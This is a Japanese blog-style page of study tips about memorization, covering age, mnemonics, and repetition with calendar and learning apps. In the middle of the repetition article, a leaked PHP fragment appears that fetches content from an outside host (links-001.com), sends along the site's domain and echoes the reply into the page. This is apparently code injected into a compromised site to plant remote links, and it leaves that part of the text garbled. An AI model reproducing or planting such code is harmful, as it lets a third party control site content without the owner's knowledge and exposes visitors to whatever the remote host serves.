前へ
次へ

年齢によって暗記の能力は変わるのか

学校で勉強をする年齢といえば10代から20代の始めぐらいの人が多く、それ以降は特に勉強しない人もいる

more

歩きながら暗記をすると覚えやすいのか

通常勉強するときといえば机に向かい椅子に座りながらになるでしょう。
学校で授業を聞くときも家で

more

意味のない数字の暗記等に語呂合わせ

鎌倉幕府が開かれた年数といえば1192年と答える人が結構いるでしょう。
いいくに作ろう鎌倉幕府

more

暗記したい時は繰り返しの学習が有効

何かを暗記するなら、「繰り返し」は大切です。
一度だけ学習するのではなく、やはり何回も繰り返してみる方が良いでしょう。
その分かりやすい例は、カレンダーのアプリです。
忘れやすいスケジュールなどは、そのアプリに登録しておく方が良いでしょう。
カレンダーのアプリには、予定を登録できる機能があります。
例えば8月25日に大事なポイントがある時は、それもカレンダーのアプリに登録しておく方が良いでしょう。
大切な予定を確実に覚えておきたいからです。
そもそも誰かとのアポイントは、たまに忘れてしまう事があります。
例えば友達との約束です。
友達と遊びたい時は、事前に日時を約束する事があるでしょう。
ところが、その約束をうっかり忘れてしまうケースもあります。
上記のような8月25日に遊ぶ約束をしていたものの、うっかり忘れてしまいますと、友達に迷惑をかけてしまう可能性があります。
それを避けるためにも、アプリに登録しておく訳です。
そもそも暗記を妨げてしまう要素の1つは、「忘却」です。
上記のような友達との約束を忘却してしまう事だけは、避けたいでしょう。
学校の試験も同じです。
中間試験で英語が出題される場合、テスト当日に単語を忘れてしまうのは避けたいでしょう。
ですがカレンダーのアプリには、「繰り返し」で通知してくれる機能があります。
事前に決めた頻度で、何回でも繰り返し予定を通知してくれるのは助かります。
アプリによる通知が繰り返されると、友達との約束も忘れづらくなります。
ですから大切なポイントは、やはりカレンダーに登録しておくのがおすすめです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

一番肝心な点は、学習の「繰り返し」です。
上述の英単語にしても、何度も何度も繰り返し学習をしていけば、嫌が応でも覚えることができます。
ただし単語などを学習したい時は、カレンダーのアプリというより学習アプリがおすすめです。
最近では、英単語の学習を効率化させてくれるアプリも沢山リリースされています。
そのアプリには、繰り返し学習の機能もありますし、上手く活用してみると良いでしょう。

Page Top